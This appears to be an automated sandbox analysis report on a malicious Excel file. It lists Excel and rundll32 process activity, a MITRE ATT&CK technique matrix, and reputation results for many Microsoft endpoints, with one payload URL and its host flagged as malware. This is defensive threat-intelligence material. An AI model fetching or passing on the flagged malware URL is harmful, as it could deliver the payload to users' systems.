Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000002.00000002.676051891.0000000002E00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000002.00000002.676051891.0000000002E00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000002.00000002.676051891.0000000002E00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000002.00000002.676051891.0000000002E00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
fadingmemoriespodcast.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
http://fadingmemoriespodcast.com/bdxduufm/5319402.jpg4%VirustotalBrowse
http://fadingmemoriespodcast.com/bdxduufm/5319402.jpg100%Avira URL Cloudmalware
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
fadingmemoriespodcast.com
35.208.103.169
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://fadingmemoriespodcast.com/bdxduufm/5319402.jpgtrue
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
    high
    https://login.microsoftonline.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
      high
      https://shell.suite.office.com:144368E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
          high
          https://autodiscover-s.outlook.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
              high
              https://cdn.entity.68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                high
                https://wus2-000.contentsync.68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                    high
                    https://powerlift.acompli.net68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v168E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                      high
                      https://cortana.ai68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                high
                                https://api.aadrm.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                      high
                                      https://cr.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                            high
                                            https://graph.ppe.windows.net68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                            high
                                                            https://graph.windows.net68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                      high
                                                                                      https://incidents.diagnostics.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                high
                                                                                                https://api.office.net68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                        high
                                                                                                                        https://ncus-000.contentsync.68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v268E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
